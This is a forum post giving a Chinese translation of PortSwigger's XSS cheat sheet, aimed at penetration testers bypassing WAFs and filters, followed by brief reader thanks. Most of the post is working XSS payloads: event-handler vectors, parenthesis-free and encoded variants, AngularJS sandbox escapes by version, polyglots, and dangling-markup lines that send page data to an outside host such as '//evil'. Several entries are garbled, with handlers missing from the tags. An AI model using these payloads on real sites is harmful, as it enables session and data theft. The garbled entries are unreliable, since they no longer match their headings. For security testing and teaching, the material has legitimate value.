用户
搜索
  • TA的每日心情

    2018-7-31 13:43
  • 签到天数: 22 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    7

    主题

    12

    帖子

    215

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2016-5-11

    i春秋签约作者

    发表于 2019-12-18 20:00:45 58082

    这是一份跨站脚本(XSS)备忘录,收集了大量的XSS攻击向量,包含了各种事件处理、通讯协议、特殊属性、限制字符、编码方式、沙箱逃逸等技巧,可以帮助渗透测试人员绕过WAF和过滤机制。

    译者注:原文由Portswigger公司的web安全学院于2019年定期更新,对的,就是那家开发著名渗透工具Burp suite的公司,最后更新时间:2019年11月8日星期五10:58:07。


    事件处理

    不需要用户交互的事件处理程序

    激活元素时触发(IE)

    <a id=x tabindex=1 onactivate=alert(1)></a>

    页面打印后触发(Chrome、Firefox、IE)

    <body onafterprint=alert(1)>  

    CSS动画取消时触发(Firefox)

    <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;"></a>

    CSS动画结束时触发(Chrome、Firefox、IE、Safari)

    <style>@keyframes x{}</style><a style="animation-name:x"></a>  

    重复CSS动画时触发(Chrome、Firefox、IE、Safari)

    <style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>  

    CSS动画开始时触发(Chrome、Firefox、IE、Safari)

    <style>@keyframes x{}</style><a style="animation-name:x"></a>  

    在激活元素之前触发(IE)

    <a id=x tabindex=1 onbeforeactivate=alert(1)></a>   

    在停用元素之前触发(IE)

     <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>  

    在页面打印前触发(Chrome、Firefox、IE)

    <body onbeforeprint=alert(1)>  

    网址更改后触发(Chrome)

    <svg><animate onbegin=alert(1) attributeName=x dur=1s>  

    svg动画开始时触发(Chrome、Firefox、Safari)

    <svg><animate onbegin=alert(1) attributeName=x dur=1s>   

    当元素失去焦点时触发(Chrome、IE、Safari)

    <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>  

    选框弹跳时触发(Firefox、IE)

    <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> 

    如果资源可以播放则触发(Chrome、Firefox、IE、Safari)

    <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>  

    加载足够的数据以完全播放资源时触发(Chrome、Firefox、IE、Safari)

    <video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>  

    停用元素时触发(IE)

    <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>  

    资源播放完毕时触发(Chrome、Firefox、IE、Safari)

    <audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> 

    资源加载失败或导致错误时触发(Chrome、Firefox、IE、Safari)

    <audio src/onerror=alert(1)>

    选框完成时触发(Firefox、IE)

    <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>  

    当元素具有焦点时触发(Chrome、IE、Safari)

     <a id=x tabindex=1 onfocus=alert(1)></a>  

    当元素具有焦点时触发(Chrome、IE、Safari)

    <a id=x tabindex=1 onfocusin=alert(1)></a> 

    当元素失去焦点时触发(Chrome、IE、Safari)

    <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>  

    如果哈希值更改,则触发(Chrome、Firefox、IE、Safari)

    <body>  

    加载元素时触发(Safari)

    <svg><a onload=alert(1)></a> 

    加载第一帧时触发(Chrome、Firefox、IE、Safari)

    <audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>  

    加载元数据时触发(Chrome、Firefox、IE、Safari)

    <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>   

    当元素完成加载时触发(Firefox)

    <image src=validimage.png onloadend=alert(1)>  

    当元素开始加载时触发(Firefox)

    <image src=validimage.png onloadstart=alert(1)>  

    当从postMessage调用接收到消息事件时触发(Chrome、Firefox、IE、Safari)

    <body onmessage=alert(1)>  

    显示页面时触发(Chrome、Firefox、IE、Safari)

    <body onpageshow=alert(1)>   

    播放资源时触发(Chrome、Firefox、IE、Safari)

    <audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> 

    触发资源正在播放(Chrome、Firefox、IE、Safari)

    <audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>  

    历史记录更改时触发(Chrome、Firefox、IE、Safari)

     <body onpopstate=alert(1)> 

    svg动画重复时触发(Chrome、Firefox、Safari)

    <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> 

    调整窗口大小时触发(Chrome、Firefox、IE、Safari)

    <body> 

    页面滚动时触发(Chrome、Firefox、IE、Safari)

    <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> 

    选框开始时触发(Firefox、IE)

    <marquee onstart=alert(1)>XSS</marquee>  

    更改时间轴时触发(Chrome、Firefox、IE、Safari)

    <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>  

    展开详细信息标签时触发(Chrome、Firefox、IE、Safari)

    <details ontoggle=alert(1) open>test</details>  

    CSS过渡取消时触发(Firefox)

    <style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>

    CSS过渡结束时触发(Chrome)

    <style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>  

    CSS过渡开始时触发(Firefox)

    <style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a> 

    未履行承诺时触发(Firefox)

    <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>  

    等待数据时触发(IE)

    <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>  

    需要用户交互的事件处理程序

    右键单击或使用鼠标中键时触发(Chrome、Firefox)

    <input onauxclick=alert(1)>

    需要复制一段文字(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    要求剪切一段文字(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    需要粘贴一段文字(IE)

    <a contenteditable>test</a>

    需要属性值的变化(Chrome、Firefox、IE、Safari)

    <input onchange=alert(1) value=xss>

    需要点击一下元素(Chrome、Firefox、IE、Safari)

    <a>test</a>

    右键单击以显示上下文菜单时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    需要复制一段文字(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    要求剪切一段文字(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    双击元素时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    触发拖动元素(Chrome、Firefox、IE、Safari)

    <a draggable="true">test</a>

    触发拖动已在元素上完成(Chrome、Firefox、IE、Safari)

    <a draggable="true">test</a>

    需要鼠标拖动(Chrome、Firefox、IE、Safari)

    <a draggable="true">test</a>

    需要鼠标拖动(Chrome、Firefox、IE、Safari)

    <a draggable="true">test</a>

    触发拖动元素(Chrome、Firefox、IE、Safari)

    <div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>

    需要鼠标拖动(Chrome、Firefox、IE、Safari)

    <a draggable="true">test</a>

    触发删除可拖动元素(Chrome、Firefox、IE、Safari)

    <div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>

    需要作为价值的变化(Chrome、Firefox、IE、Safari)

    <input oninput=alert(1) value=xss>

    需要具有不满足其约束的元素(例如必填属性)的表单提交。(Chrome、Firefox、IE、Safari)

    <form><input oninvalid=alert(1) required><input type=submit>

    按下键时触发(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    按下键时触发(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    释放按键时触发(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    按下鼠标时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    当鼠标悬停在元素上时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    当鼠标移离元素时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    需要鼠标移动(Chrome、Firefox、IE、Safari)

    <a>test</a>

    当鼠标移离元素时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    需要将鼠标悬停在元素上(Chrome、Firefox、IE、Safari)

    <a>test</a>

    释放鼠标按钮时触发(Chrome、Firefox、IE、Safari)

    <a>test</a>

    需要粘贴一段文字(Chrome、Firefox、IE、Safari)

    <a contenteditable>test</a>

    需要点击元素才能暂停(Chrome、Firefox、IE、Safari)

    <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

    需要点击(Chrome、Firefox、IE、Safari)

    <form onreset=alert(1)><input type=reset>

    提交表单并且输入具有搜索的type属性时触发(Chrome)

    <form><input type=search onsearch=alert(1) value="Hit return" autofocus>

    需要点击元素时间轴(Chrome、Firefox、IE、Safari)

    <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

    需要点击元素时间轴(Chrome、Firefox、IE、Safari)

    <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

    需要选择文字(Chrome、Firefox、IE、Safari)

    <input onselect=alert(1) value="XSS" autofocus>

    需要提交表单(Chrome、Firefox、IE、Safari)

    <form onsubmit=alert(1)><input type=submit>

    需要在页面上的任意位置单击并重新加载(Chrome)

    <svg onunload=window.open('javascript:alert(1)')>

    需要调节音量(Chrome、Firefox、IE、Safari)

    <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

    使用鼠标滚轮时触发(Chrome、Firefox、IE、Safari)

    <body onwheel=alert(1)>

    限制字符

    无括号,使用异常处理

    <script>onerror=alert;throw 1</script>

    无括号,无分号,使用异常处理

    <script>{onerror=alert}throw 1</script>

    无括号的异常处理,没有使用表达式的半冒号

    <script>throw onerror=alert,1</script>

    无括号异常处理和evil

    <script>throw onerror=eval,'=alert\x281\x29'</script>

    无括号,在Firefox上使用异常处理和evil

    <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

    无括号,使用ES6 hasInstance和instanceof与eval

    <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

    无括号,使用ES6的hasInstance和instanceof以及eval

    <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

    无括号,使用位置重定向

    <script>location='javascript:alert\x281\x29'</script>

    无字符串,使用位置没有括号重定向

    <script>location=name</script>

    无括号,使用模板字符串

    <script>alert`1`</script>

    前端框架

    Bootstrap onanimationstart事件

    
    <xss class=progress-bar-animated onanimationstart=alert(1)>

    Bootstrap ontransitionend事件

    <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

    通讯协议

    iframe src属性JavaScript协议

    <iframe src="javascript:alert(1)">

    具有JavaScript协议的对象data属性

    <object data="javascript:alert(1)">

    使用JavaScript协议嵌入src属性

    <embed src="javascript:alert(1)">

    标准的JavaScript协议

    <a href="javascript:alert(1)">XSS</a>

    不区分大小写的协议

    <a href="JaVaScript:alert(1)">XSS</a>

    协议之前允许使用字符\x01- \x20

    <a href="         javascript:alert(1)">XSS</a>

    协议中允许使用字符\ x09,\x0a,\x0d

    <a href="javas        cript:alert(1)">XSS</a>

    协议名称后在冒号前允许字符\x09,\x0a,\x0d

    <a href="javas  cript:alert(1)">XSS</a>

    带有JavaScript协议的SVG中的Xlink命名空间

    <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

    使用值的SVG动画标签

    <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

    SVG动画标签用于

    <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

    SVG设置标签

    <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

    脚本src中的数据协议

    <script src="data:text/javascript,alert(1)"></script>

    SVG脚本href属性,无需关闭脚本标签

    <svg><script href="data:text/javascript,alert(1)" />

    SVG使用元素Chrome/Firefox

    <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

    带有数据URL的导入语句

    <script>import('data:text/javascript,alert(1)')</script>

    具有JavaScript协议的基本标记重写了相对URL

    <base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

    MathML使任何标签都可点击

    <math><x href="javascript:alert(1)">blah

    按钮和动作

    <form><button formaction=javascript:alert(1)>XSS

    输入和形式

    <form><input type=submit formaction=javascript:alert(1) value=XSS>

    形式与行动

    <form action=javascript:alert(1)><input type=submit value=XSS>

    Isindex和formaction

    <isindex type=submit formaction=javascript:alert(1)>

    index和action

    <isindex type=submit action=javascript:alert(1)>

    将元素与外部网址一起使用

    <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

    其他有用的属性

    使用srcdoc属性

    <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

    对实体使用srcdoc

    <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

    在页面上的任何位置(甚至在表单外部)单击提交元素

    <form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

    隐藏的输入:访问键属性可以在通常无法利用的元素上启用XSS

    <input type="hidden" accesskey="X"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

    链接元素:访问键属性可以在通常无法利用的元素上启用XSS

    <link rel="canonical" accesskey="X" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

    下载属性可以保存当前网页的副本

    <a href=# download="filename.html">Test</a>

    使用Referrerpolicy禁用引荐来源网址

    <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

    特殊标签

    重定向到其他域

    <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

    元字符集属性UTF-7

    <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    元字符集UTF-7

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    UTF-7 BOM字符(必须在文档开头)1

    +/v8
    +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    UTF-7 BOM字符(必须在文档开头)2

    +/v9
    +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    UTF-7 BOM字符(必须在文档开头)3

    +/v+
    +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    UTF-7 BOM字符(必须在文档开头)4

    +/v/
    +ADw-script+AD4-alert(1)+ADw-/script+AD4-

    升级不安全的请求

    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

    通过iframe沙箱禁用JavaScript

    <iframe sandbox src="//portswigger-labs.net"></iframe>

    禁用引荐来源

    <meta name="referrer" content="no-referrer">

    编码方式

    超长UTF-8

    %C0%BCscript>alert(1)</script>
    %E0%80%BCscript>alert(1)</script>
    %F0%80%80%BCscript>alert(1)</script>
    %F8%80%80%80%BCscript>alert(1)</script>
    %FC%80%80%80%80%BCscript>alert(1)</script>

    Unicode转义

    <script>\u0061lert(1)</script>

    Unicode转义ES6样式

    <script>\u{61}lert(1)</script>

    Unicode转义ES6样式零填充

    <script>\u{0000000061}lert(1)</script>

    十六进制编码JavaScript转义

    <script>eval('\x61lert(1)')</script>

    八进制编码

    <script>eval('\141lert(1)')</script>
    <script>eval('alert(\061)')</script>
    <script>eval('alert(\61)')</script>

    带有可选分号的十进制编码

    <a href="javascript:alert(1)">XSS</a><a href="javascript:alert(1)">XSS</a>

    带有HTML编码的SVG脚本

    <svg><script>alert(1)</script></svg>
    <svg><script>alert(1)</script></svg>
    <svg><script>alert(1)</script></svg>
    <svg><script>x="",alert(1)//";</script></svg>

    带填充零的十进制编码

    <a href="javascript:alert(1)">XSS</a>

    十六进制编码实体

    <a href="javascript:alert(1)">XSS</a>

    如果下一个字符不是a-f0-9,则不使用分号的十六进制编码

    <a href="javascript:alert(1)">XSS</a>
    <a href="j
    avascript:alert(1)">XSS</a>
    <a href="j avascript:alert(1)">XSS</a>

    带填充零的十六进制编码

    <a href="javascript:alert(1)">XSS</a>

    十六进制编码不区分大小写

    <a href="javascript:alert(1)">XSS</a>

    HTML实体

    <a href="javascript:alert(1)">XSS</a>
    <a href="java        script:alert(1)">XSS</a>
    <a href="javascript:alert(1)">XSS</a>
    <a href="javascript:alert(1)">XSS</a>

    网址编码

    <a href="javascript:x='%27-alert(1)-%27';">XSS</a>

    HTML实体和URL编码

    <a href="javascript:x='%27-alert(1)-%27';">XSS</a>

    混淆

    Firefox在&之后允许NULL

    <a href="javascriptjavascript:alert(1)">Firefox</a>

    Firefox允许在命名实体内使用NULL

    <a href="javascript:alert(1)">Firefox</a>

    Firefox在开头的注释中允许使用NULL字符

    
    <!-- ><img title="--><iframe/onload=alert(1)>"> -->
    <!-- ><img title="--><iframe/onload=alert(1)>"> -->

    带有base64的脚本src中的数据协议

    <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

    客户端模板注入

    AngularJS沙箱逃逸

    版本:1.0.1-1.1.5

    {{constructor.constructor('alert(1)')()}}

    版本:1.0.1-1.1.5(较短)

    {{$on.constructor('alert(1)')()}}

    版本:1.2.0-1.2.1

    {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

    版本:1.2.2-1.2.5

    {{{}.")));alert(1)//"}}

    版本:1.2.6-1.2.18

    {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

    版本:1.2.19-1.2.23

    {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

    版本:1.2.24-1.2.29

    {{{}.")));alert(1)//"}}

    版本:1.2.27-1.2.29/1.3.0-1.3.20

    {{{}.")));alert(1)//"}}

    版本:1.3.0

    {{!ready && (ready = true) && (
    !call
    ? $$watchers[0].get(toString.constructor.prototype)
    : (a = apply) &&
    (apply = constructor) &&
    (valueOf = call) &&
    (''+''.toString(
    'F = Function.prototype;' +
    'F.apply = F.a;' +
    'delete F.a;' +
    'delete F.valueOf;' +
    'alert(1);'
    )));}}

    版本:1.3.3-1.3.18

    {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}

    版本:1.3.19

    {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

    版本:1.3.20

    {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

    版本:1.4.0-1.4.9

    {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

    版本:1.5.0-1.5.8

    {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

    版本:1.5.9-1.5.11

    {{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
    }}

    版本:> = 1.6.0

    {{constructor.constructor('alert(1)')()}}

    版本:> = 1.6.0(较短)

    {{$on.constructor('alert(1)')()}}

    基于DOM的AngularJS沙箱逃逸

    所有版本(Chrome)

    <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

    所有版本(Chrome)较短

    <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

    所有版本(所有浏览器)都较短

    <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

    版本:1.2.0-1.5.0

    <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

    无脚本攻击

    背景属性

    <body background="//evil?
    <table background="//evil?
    <table><thead background="//evil?
    <table><tbody background="//evil?
    <table><tfoot background="//evil?
    <table><td background="//evil?
    <table><th background="//evil?

    链接href样式表

    <link rel=stylesheet href="//evil?

    链接href图标

    <link rel=icon href="//evil?

    Meta刷新

    <meta http-equiv="refresh" content="0; http://evil?

    Img通过src属性传递标记

    <img src="//evil?
    <image src="//evil?

    使用track元素的视频

    <video><track default src="//evil?

    使用sourcr元素和src属性的视频

    ```python'
    <video><source src="//evil?

    
    使用source元素和src属性的音频
    
    ```python
    <audio><source src="//evil?

    输入src

    <input type=image src="//evil?

    使用formaction的按钮

    <form><button style="width:100%;height:100%" type=submit formaction="//evil?

    使用formaction输入

     <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

    表单使用action

    <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

    使用src属性的Isindex

    <isindex type=image src="//evil?

    Isindex使用submit

    <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

    Object data

    <object data="//evil?

    iframe src

    <iframe src="//evil?

    Embed src

    <embed src="//evil?

    使用textarea标记并发布到外部站点

    <form><button formaction=//evil>XSS</button><textarea name=x>

    使用表单目标通过window.name传递标记数据

    <button form=x>XSS</button><form id=x action=//evil target='

    使用基本目标通过window.name传递标记数据

    <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

    使用formtarget通过window.name传递标记数据

    <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

    使用基本href传递数据

    <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

    使用embed src从页面传递数据

    <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

    使用iframe窗口名称从页面传递数据

    <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

    使用object窗口名称从页面传递数据

    <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

    使用frameset窗口名称从页面传递数据

    <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

    多语言有效载荷

    多语言有效载荷1

    javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

    多语言有效载荷2

    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
     onmouseover=/*<svg/*/onload=alert()//>

    经典向量(XSS加密)

    具有JavaScript协议的Image src

    <img src="javascript:alert(1)">

    带有JavaScript协议的正文背景

    <body background="javascript:alert(1)">

    随着现代浏览器使用空来源,iframe数据网址不再起作用

    <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

    用于IE的VBScript协议

    <a href="vbscript:MsgBox+1">XSS</a>
    <a href="#">XSS</a>
    <a href="#">XSS</a>
    <a href="#">XSS</a>
    <a href="#">XSS</a>
    <a href="#" language=vbs>XSS</a>

    JScript compact是JS的最小版本,未在IE中广泛使用

    <a href="#">test</a>
    <a href="#">test</a>

    JScript.Encode允许编码的JavaScript

    <a href=# language="JScript.Encode">XSS</a>
    <a href=#>XSS</a>

    VBScript.Encoded允许编码的VBScript

    <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
    <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

    用于Netscape Navigator的JavaScript实体

    <a title="&{alert(1)}">XSS</a>

    Netscape Navigator曾经支持JavaScript样式表

    <link href="xss.js" rel=stylesheet type="text/javascript">

    用于消耗标记的按钮

    <form><button name=x formaction=x><b>stealme

    IE9选择元素和纯文本用于消耗标记

    <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

    仅限XBL Firefox <= 2

    <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
    <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
    <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
    <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

    XBL也使用数据URL在FF3.5中工作

    <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />

    CSS表达式<= IE7

    <div style=xss:expression(alert(1))>
    <div style=xss:expression(1)-alert(1)>
    <div style=xss:expressio\6e(alert(1))>
    <div style=xss:expressio\006e(alert(1))>
    <div style=xss:expressio\00006e(alert(1))>
    <div style=xss:expressio\6e(alert(1))>
    <div style=xss:expressio\6e(alert(1))>

    在怪癖模式下,IE允许您使用=代替:

    <div style=xss=expression(alert(1))>
    <div style="color=red">test</div>

    IE较旧模式的行为

    <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

    IE中较旧版本的函数中支持的事件处理程序

    <script>
    function window.onload(){
    alert(1);
    }
    </script>
    <script>
    function window::onload(){
    alert(1);
    }
    </script>
    <script>
    function window.location(){
    }
    </script>
    <body>
    <script>
    function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}
    </script>
    </body>
    <body>
    <script>
    function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
    </script>
    </body>

    GreyMagic HTML + time漏洞利用(即使在5 docmode下也不再起作用)

    <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
    



    ### 每周一篇原创安全文章,致力于分享原创高质量干货,包括但不限于:渗透测试、代码审计、应急响应、安全运维。

    一个网络安全爱好者,对技术有着偏执狂一样的追求。
    感谢分享
    使用道具 举报 回复
    发表于 2019-12-19 10:45:19
    学到了,感谢分享
    My blog :http://www.e-wolf.top
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    大佬。有没有脚本。可以自动测试的。。。。。
    使用道具 举报 回复
    感谢分享,这个是干货,绝壁收藏!!!!!!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册